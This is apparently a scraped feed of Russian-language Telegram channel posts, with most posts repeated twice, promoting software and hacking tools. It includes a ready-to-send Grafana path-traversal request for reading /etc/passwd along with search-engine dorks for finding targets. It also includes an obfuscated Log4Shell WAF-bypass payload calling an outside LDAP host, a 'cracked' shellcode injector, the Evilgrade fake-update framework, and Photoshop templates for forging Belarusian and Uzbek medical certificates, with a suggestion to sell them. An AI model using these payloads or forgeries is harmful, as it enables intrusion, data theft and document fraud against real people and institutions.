JDownloader 2.0 — софт для скачивания контента с 3784 сайтов, включая популярные файлообменники, соц.сети и многое другое.
Разумеется, YouTube, VK и все, кто прячет прямые ссылки на скачивание есть в списке JDownloader. Там вообще есть все.
Как использовать для скачивания файлов с заблокированных сайтов через cеть Tor? (Windows)
1. Перейдите в Настройки, далее вкладка Менеджер соединений и нажмите на кнопку Добавить.
2. Замените тип на Socks5, в поле Хост/порт введите localhost и 9050:
3. Нажмите ОК для сохранения настроек и закрытия окна.
JDownloader ротирует соединения. Поэтому если вы скачиваете с заблокированного сайта, то снимите галочку с соединения Без прокси.
#софт #Tor
Разумеется, YouTube, VK и все, кто прячет прямые ссылки на скачивание есть в списке JDownloader. Там вообще есть все.
Как использовать для скачивания файлов с заблокированных сайтов через cеть Tor? (Windows)
1. Перейдите в Настройки, далее вкладка Менеджер соединений и нажмите на кнопку Добавить.
2. Замените тип на Socks5, в поле Хост/порт введите localhost и 9050:
3. Нажмите ОК для сохранения настроек и закрытия окна.
JDownloader ротирует соединения. Поэтому если вы скачиваете с заблокированного сайта, то снимите галочку с соединения Без прокси.
#софт #Tor
Vortimo - приложение для проведения онлайн расследований от основателя компании Paterva (подарившего миру Maltego) Рулофа Темминга. Поставляется в виде десктопного приложения и расширения для браузера, которое в реальном времени записывает всю вашу сессию в браузере, архивируя локально страницы и попутно анализируя контекст.
Используя регулярные выражения, отдельно выделяет все найденные контактные данные, такие как номера телефонов или адреса электронной почты для дальнейшего обогащения при помощи некоторых сервисов, вроде Dehashed, People, Riskiq (достаточно предварительно указать API-ключи). Парсит и тегирует другую информацию: ссылки, никнеймы и хэштеги.
Как и Maltego, позволяет строить графы по собранным данным, но, не поддерживает модульную систему, за счет которой можно было бы расширять базовую функциональность. Имеет несколько вариантов лицензии, каждая из которых отличается ограничениями на количество возможных проектов - поэтому все инструменты доступны сразу из коробки.
Используя регулярные выражения, отдельно выделяет все найденные контактные данные, такие как номера телефонов или адреса электронной почты для дальнейшего обогащения при помощи некоторых сервисов, вроде Dehashed, People, Riskiq (достаточно предварительно указать API-ключи). Парсит и тегирует другую информацию: ссылки, никнеймы и хэштеги.
Как и Maltego, позволяет строить графы по собранным данным, но, не поддерживает модульную систему, за счет которой можно было бы расширять базовую функциональность. Имеет несколько вариантов лицензии, каждая из которых отличается ограничениями на количество возможных проектов - поэтому все инструменты доступны сразу из коробки.
👍1
LockBox
LockBox — это дистрибутив GNU/Linux, производный от Debian, Ubuntu и elementary OS, специально разработан для хранения и управления криптовалютами.
Он включает в себя несколько усиленных изменений конфигурации в целях безопасности, строго ограничительную настройку брандмауэра, несколько приложений, предназначенных для резервного копирования данных, диспетчер паролей и браузер LibreWolf.
https://github.com/StratousLabs/LockBox
Сайт: https://www.thelbx.io/
=============
Если нашел интересный софт, поделись с сообществом: @FOSS_triangle_bot
LockBox — это дистрибутив GNU/Linux, производный от Debian, Ubuntu и elementary OS, специально разработан для хранения и управления криптовалютами.
Он включает в себя несколько усиленных изменений конфигурации в целях безопасности, строго ограничительную настройку брандмауэра, несколько приложений, предназначенных для резервного копирования данных, диспетчер паролей и браузер LibreWolf.
https://github.com/StratousLabs/LockBox
Сайт: https://www.thelbx.io/
=============
Если нашел интересный софт, поделись с сообществом: @FOSS_triangle_bot
Vircadia
Децентрализованная метавселенная с открытым исходным кодом, которая позволяет отдельным лицам и организациям развертывать свои собственные решения виртуального мира.
▫️Работает на настольных компьютерах и через VR
▫️Аватары в полный рост
▫️Сотни пользователей одновременно
▫️16 км³ мирового пространства на сервере
▫️Твой сервер — твои правила. Нет никаких запретов
https://github.com/vircadia
Сайт: https://vircadia.com/
=============
Если нашел интересный софт, поделись с сообществом: @FOSS_triangle_bot
Децентрализованная метавселенная с открытым исходным кодом, которая позволяет отдельным лицам и организациям развертывать свои собственные решения виртуального мира.
▫️Работает на настольных компьютерах и через VR
▫️Аватары в полный рост
▫️Сотни пользователей одновременно
▫️16 км³ мирового пространства на сервере
▫️Твой сервер — твои правила. Нет никаких запретов
https://github.com/vircadia
Сайт: https://vircadia.com/
=============
Если нашел интересный софт, поделись с сообществом: @FOSS_triangle_bot
📄 Несанкционированное чтение файлов в Grafana (0day)
Похоже, что новый 0day LFI в Grafana существует благодаря плагину
Тем временем, найти Grafana можно с помощью дорка для ZoomEye:
Или в Shodan:
—————————
UPD:
Работает и через другие плагины в
#web #lfi #0day
Похоже, что новый 0day LFI в Grafana существует благодаря плагину
grafana-clock-panel. Достаточно отправить GET запрос вида:GET /public/plugins/grafana-clock-panel/../../../../../../../etc/passwdТем временем, найти Grafana можно с помощью дорка для ZoomEye:
app:"Grafana"Или в Shodan:
Grafana—————————
UPD:
Работает и через другие плагины в
/public/plugins/*#web #lfi #0day
Shellter Pro v.3.5, разблокированная версия
Shellter - это инструмент для динамического внедрения шелл-кода и первый из когда-либо созданных по-настоящему динамический PE-инфектор. Его можно использовать для внедрения шелл-кода в собственные приложения Windows (в настоящее время только 32-битные приложения). Шелл-код может быть вашим или созданным с помощью фреймворка, например Metasploit.
Как это работает
https://bit.ly/3pN32d4
Как пользоваться
https://bit.ly/3pKzahr
YouTube
https://bit.ly/3oCC7kE
# вредоносное ПО # инструменты
Shellter - это инструмент для динамического внедрения шелл-кода и первый из когда-либо созданных по-настоящему динамический PE-инфектор. Его можно использовать для внедрения шелл-кода в собственные приложения Windows (в настоящее время только 32-битные приложения). Шелл-код может быть вашим или созданным с помощью фреймворка, например Metasploit.
Как это работает
https://bit.ly/3pN32d4
Как пользоваться
https://bit.ly/3pKzahr
YouTube
https://bit.ly/3oCC7kE
# вредоносное ПО # инструменты
Snap-Scraper
Snap Scraper enables users to download media uploaded to Snapchat's Snap Map using a set of latitude and longitude coordinates.
https://github.com/rhematt/Snap-Scraper
Snap Scraper enables users to download media uploaded to Snapchat's Snap Map using a set of latitude and longitude coordinates.
https://github.com/rhematt/Snap-Scraper
GitHub
GitHub - rhematt/Snap-Scraper: Snap Scraper enables users to download media uploaded to Snapchat's Snap Map using a set of latitude…
Snap Scraper enables users to download media uploaded to Snapchat's Snap Map using a set of latitude and longitude coordinates. - rhematt/Snap-Scraper
Sitadel - Web Application #Security Scanner
Sitadel is basically an update for WAScan making it compatible for python >= 3.4 It allows more flexibility for you to write new modules and implement new features :
▫️ Frontend framework detection
▫️ Content Delivery Network detection
▫️ Define Risk Level to allow for scans
▫️ Plugin system
▫️ Docker image available to build and run
https://github.com/shenril/Sitadel
Sitadel is basically an update for WAScan making it compatible for python >= 3.4 It allows more flexibility for you to write new modules and implement new features :
▫️ Frontend framework detection
▫️ Content Delivery Network detection
▫️ Define Risk Level to allow for scans
▫️ Plugin system
▫️ Docker image available to build and run
https://github.com/shenril/Sitadel
GitHub
GitHub - shenril/Sitadel: Web Application Security Scanner
Web Application Security Scanner. Contribute to shenril/Sitadel development by creating an account on GitHub.
Kali Tools — список инструментов Kali Linux и подробные инструкции по их применению.
Искал описание команды "shred", а в итоге наткнулся на целую энциклопедию по Kali Linux. Список инструментов следующий:
— Сбор информации
— Анализ уязвимостей
— Беспроводные атаки
— Веб приложения
— Криминалистические инструменты
— Стресс-тестирование
— Инструменты эксплуатации
—Sniffing и Spoofing
— Атака на пароли
— Поддержка доступа
— Взлом оборудования
— Обратная инженерия
— Анонимность
— Инструменты по составлению отчётов
— Уязвимые среды и программы для тренировки
— Шифрование данных и антикриминалистика
Все описано максимально подробно. Инструкции меня очень впечатлили. Если вы хотели изучить Kali Linux, но не знали с чего начать — это однозначно ваш шанс!
#сайт #сервис #взлом #анонимность
Искал описание команды "shred", а в итоге наткнулся на целую энциклопедию по Kali Linux. Список инструментов следующий:
— Сбор информации
— Анализ уязвимостей
— Беспроводные атаки
— Веб приложения
— Криминалистические инструменты
— Стресс-тестирование
— Инструменты эксплуатации
—Sniffing и Spoofing
— Атака на пароли
— Поддержка доступа
— Взлом оборудования
— Обратная инженерия
— Анонимность
— Инструменты по составлению отчётов
— Уязвимые среды и программы для тренировки
— Шифрование данных и антикриминалистика
Все описано максимально подробно. Инструкции меня очень впечатлили. Если вы хотели изучить Kali Linux, но не знали с чего начать — это однозначно ваш шанс!
#сайт #сервис #взлом #анонимность
👍1
Фейк_справка_Республики_Беларусь.rar
107.7 MB
#слив
PSD-шаблон медицинской справки Республики Беларусь 🇧🇾
В данном архиве содержится всё для создания справки, а именно: инструкция, образец, шрифты и сам шаблон для Photoshop. Устанавливаем шрифты, закидываем шаблон в фотошоп и заполняем справку.
Теперь вы можете "официально" прогуливать школу или даже подзаработать продавая справки в чатах услуг а-ля Lolz Team.
Скриншот
Пароль на архив: @mamontyatina
PSD-шаблон медицинской справки Республики Беларусь 🇧🇾
В данном архиве содержится всё для создания справки, а именно: инструкция, образец, шрифты и сам шаблон для Photoshop. Устанавливаем шрифты, закидываем шаблон в фотошоп и заполняем справку.
Теперь вы можете "официально" прогуливать школу или даже подзаработать продавая справки в чатах услуг а-ля Lolz Team.
Скриншот
Пароль на архив: @mamontyatina
Фейк справка Узбекистана.rar
159.5 MB
#слив
PSD-шаблон медицинской справки Узбекистана 🇺🇿
В данном архиве содержится всё для создания справки, а именно: инструкция, образец, шрифты и сам шаблон для Photoshop. Устанавливаем шрифты, закидываем шаблон в фотошоп и заполняем справку.
Теперь вы можете "официально" прогуливать школу или даже подзаработать продавая справки в чатах услуг а-ля Lolz Team.
Скриншот
Пароль на архив: @mamontyatina
PSD-шаблон медицинской справки Узбекистана 🇺🇿
В данном архиве содержится всё для создания справки, а именно: инструкция, образец, шрифты и сам шаблон для Photoshop. Устанавливаем шрифты, закидываем шаблон в фотошоп и заполняем справку.
Теперь вы можете "официально" прогуливать школу или даже подзаработать продавая справки в чатах услуг а-ля Lolz Team.
Скриншот
Пароль на архив: @mamontyatina
Forwarded from Template User
Found a bypass working for a few WAF
${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//your.burpcollaborator.net/a}
Good luck 🤞🏻
#log4j #Log4Shell #log4jRCE #bugbountytip
${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//your.burpcollaborator.net/a}
Good luck 🤞🏻
#log4j #Log4Shell #log4jRCE #bugbountytip
nse-log4shell
#Nmap NSE scripts to check against log4shell or LogJam vulnerabilities (CVE-2021-44228). NSE scripts check most popular exposed services on the Internet. It is basic script where you can customize payload.
https://github.com/Diverto/nse-log4shell
#log4j2 #log4jRCE #log4jRCE #bugbounty
#Nmap NSE scripts to check against log4shell or LogJam vulnerabilities (CVE-2021-44228). NSE scripts check most popular exposed services on the Internet. It is basic script where you can customize payload.
https://github.com/Diverto/nse-log4shell
#log4j2 #log4jRCE #log4jRCE #bugbounty
GitHub
GitHub - Diverto/nse-log4shell: Nmap NSE scripts to check against log4shell or LogJam vulnerabilities (CVE-2021-44228)
Nmap NSE scripts to check against log4shell or LogJam vulnerabilities (CVE-2021-44228) - Diverto/nse-log4shell
log4j-payload-generator
https://github.com/woodpecker-appstore/log4j-payload-generator
#log4j2 #log4jRCE #log4jRCE #bugbounty
https://github.com/woodpecker-appstore/log4j-payload-generator
#log4j2 #log4jRCE #log4jRCE #bugbounty
GitHub
GitHub - woodpecker-appstore/log4j-payload-generator: Log4j jndi injects the Payload generator
Log4j jndi injects the Payload generator. Contribute to woodpecker-appstore/log4j-payload-generator development by creating an account on GitHub.
Evilgrade
Modular Framework To Take Advantage Of Poor Upgrade Implementations By Injecting Fake Updates.
Evilgrade is a modular framework that allows the user to take advantage of poor upgrade implementations by injecting fake updates. It comes with pre-made binaries (agents), a working default configuration for fast pentests, and has it's own WebServer and DNSServer modules.
Easy to set up new settings, and has an autoconfiguration when new binary agents are set.
When should I use evilgrade?
This framework comes into play when the attacker is able to make hostname redirections (manipulation of victim's dns traffic), and such thing can be done on 2 scenarios:
Internal scenery:
1. Internal DNS access
2. ARP spoofing
3. DNS Cache Poisoning
4. DHCP spoofing
5. TCP hijacking
6. Wi-Fi Access Point impersonation
External scenery:
1. Internal DNS access
2. DNS Cache Poisoning
How does it work?
Evilgrade works with modules, in each module there's an implemented structure which is needed to emulate a fake update for an specific application/system.
https://github.com/infobyte/evilgrade
Modular Framework To Take Advantage Of Poor Upgrade Implementations By Injecting Fake Updates.
Evilgrade is a modular framework that allows the user to take advantage of poor upgrade implementations by injecting fake updates. It comes with pre-made binaries (agents), a working default configuration for fast pentests, and has it's own WebServer and DNSServer modules.
Easy to set up new settings, and has an autoconfiguration when new binary agents are set.
When should I use evilgrade?
This framework comes into play when the attacker is able to make hostname redirections (manipulation of victim's dns traffic), and such thing can be done on 2 scenarios:
Internal scenery:
1. Internal DNS access
2. ARP spoofing
3. DNS Cache Poisoning
4. DHCP spoofing
5. TCP hijacking
6. Wi-Fi Access Point impersonation
External scenery:
1. Internal DNS access
2. DNS Cache Poisoning
How does it work?
Evilgrade works with modules, in each module there's an implemented structure which is needed to emulate a fake update for an specific application/system.
https://github.com/infobyte/evilgrade
GitHub
GitHub - infobyte/evilgrade: Evilgrade is a modular framework that allows the user to take advantage of poor upgrade implementations…
Evilgrade is a modular framework that allows the user to take advantage of poor upgrade implementations by injecting fake updates. - infobyte/evilgrade